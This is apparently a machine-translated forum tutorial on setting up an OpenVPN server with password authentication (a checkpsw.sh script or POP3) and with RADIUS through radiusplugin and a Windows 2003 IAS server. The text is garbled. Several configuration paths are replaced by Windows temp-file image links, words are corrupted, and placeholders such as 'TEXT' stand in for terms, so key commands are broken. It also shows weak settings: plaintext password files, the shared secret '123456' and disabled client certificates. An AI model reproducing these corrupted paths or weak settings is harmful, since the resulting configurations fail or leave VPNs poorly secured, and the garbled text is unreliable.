Purpose: The client is still connected to the corporate LAN but for the convenience of user management, the authentication data is from the TEXT number
According to the library.
Basic settings of OpenVPN Server: The connection method is routed, and the authentication method is TEXT/POP3 authentication
The proposed device uses tun
1. Download the TEXT authentication script checkpsw.sh and copy it to the /usr/local/etc/ directory and chmod u+x.
http://openvpn.se/files/other/
Note: 1. If there is a problem with saving the script to Windows and then uploading Linux, it is best to create a new one with the same name in that directory
The file is then pasted in from the console.
2. The script doesn't start with #! It needs to be corrected.
2. Configure the server configuration file, on the basis of (1).
Add the following lines:
# auth-user-pass-verify cmd method: Query client for username/password and
# run scrip{filter}t cmd to verify. If method=’via-env’, pass
# user/pass via environment, if method=’via-file’, pass
# user/pass via temporary file.
auth-user-pass-verify /usr/local/etcfile:///C:\Users\lenovo\AppData\Local\Temp\)QN1UH78VKP2T7)IA]ZM(FW.gifeckpsw.sh via-env
#不请求客户的CA证书, use User/Pass authentication
client-cert-not-required
#使用客户提供的UserName作为Common Name
username-as-common-name
3. Configure the client profile
Comment off
; cert client1.crt
; key client1.key
increase
#询问用户名和密码
auth-user-pass
4. Change the PASSFILE variable in the checkpsw.sh to .
PASSFILE=”/usr/local/etc/psw-file”
5. Create a /usr/local/etc/psw-file with the following contents:
Format: Username Tab Password
User1 pass
User2 pass
Note: After the experiment was successful, I rewrote it with perl after checkpsw.sh (checkpsw.pl in the directory), too
Yes.
6. By the same principle, we can also use POP3 authentication (^_^ others of course are also available)
See popauth.pl in the table of contents for scripts
(5) Set up OpenVPN Server routing mode + password authentication + RADIUS
Network environment: Add a win2003 server with an IP address of 192.168.80.130 on the basis of (1).
^_^ Sorry, I put the server on the public network. But fortunately, it was a test.
Purpose: The client is still connected to the corporate LAN, but for the convenience of user management, the authentication data is from the radius number
According to the library.
OpenVPN Server basic settings: the connection method is routed, the authentication method is radius authentication, and the virtual device is used
Use tun
1. Set up a Radius server
See Appendix Building IAS Services under win2003
2. Configure radiusplugin
1.radiusplugin_v2.0.tar.gz: radiusplugin.so can be compiled
Go to http://www.nongnu.org/radiusplugin/ to download
2. libgcrypt support library: You can compile /usr[img]file:///C:\Users\lenovo\AppData\Local\Temp\)A[Y)I~](ZC9Z[3Y)IDK7LK.gif[/img]b[img]file:///C:\Users\lenovo\AppData\Local\Temp\)A[Y)I~]( ZC9Z[3Y)IDK7LK.gif[/img]bgcrypt.so.11
Download it on ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.2.4.tar.gz
3. libgpg-error support library: /usr/local[img]file:///C:\Users\lenovo\AppData\Local\Temp\)A[Y)I~](ZC9Z[3Y)IDK7LK.gif[/img]b[img]file:///C:\Users\lenovo\AppData\Local\Temp\)A [Y) I~](ZC9Z[3Y)IDK7LK.gif[/img]bgpg-error.so.0
Download it to ftp://ftp.gnupg.org/gcrypt/libgpg-error/libgpg-error-1.5.tar.gz
Simply compile the above 3 supported libraries, configure; make; make install。
We are going to use radiusplugin.so, and the rest is radiusplugin.so's support library.
Well, if you can get radiusplugin.so, you have succeeded 80%, and the rest is the configuration.
Copy radiusplugin.so to /usr/local/etc[img]file:///C:\Users\lenovo\AppData\Local\Temp\)A[Y)I~](ZC9Z[3Y)IDK7LK.gif[/img]b and configure its configuration file radiusplugin.conf
The content is as follows:
# The NAS identifier which is sent to the RADIUS server
NAS-Identifier=OpenVpn
# The service type which is sent to the RADIUS server
Service-Type=5
# The framed protocol which is sent to the RADIUS server
Framed-Protocol=1
# The NAS port type which is sent to the RADIUS server
NAS-Port-Type=5
# This is the IP running the OpenVPN server, which acts as a Radius client
NAS-IP-Address=192.168.80.129
#这里指明 OpenVPN's configuration location
OpenVPNConfig=/usr/local/etcfile:///C:\Users\lenovo\AppData\Local\Temp\V7(XMWRN]{G8~CI}BCCR3QC.gifrver.conf
# Here define that more than 1 radius server parameter can be used as a backup
server
{
# The UDP port for radius accounting.
acctport=1813
# The UDP port for radius authentication.
authport=1812
# This is the IP of my radius server, and the user is added.
name=192.168.80.130
# How many times should the plugin send the if there is no response?
retry=1
# How long should the plugin wait for a response?
wait=1
# The shared secret. Configure the shared key in winradius and set the -system-NAS key
sharedsecret=123456
}
3. Configure the server configuration file, on the basis of (1).
Add the following lines:
#说明使用的插件
plugin /usr/local/etc[img]file:///C:\Users\lenovo\AppData\Local\Temp\)A[Y)I~](ZC9Z[3Y)IDK7LK.gif[/img]b/radiusplugin.so /usr/local/etc/radius.conf
#不请求客户的CA证书, use User/Pass authentication
client-cert-not-required
#使用客户提供的UserName作为Common Name
username-as-common-name
4. Configure the client profile
Comment off
; cert client1.crt
; key client1.key
increase
#询问用户名和密码
auth-user-pass
|
Posted on 9/17/2015 7:34:21 PM
|
|
|
Posted on 9/22/2015 2:55:31 AM
|
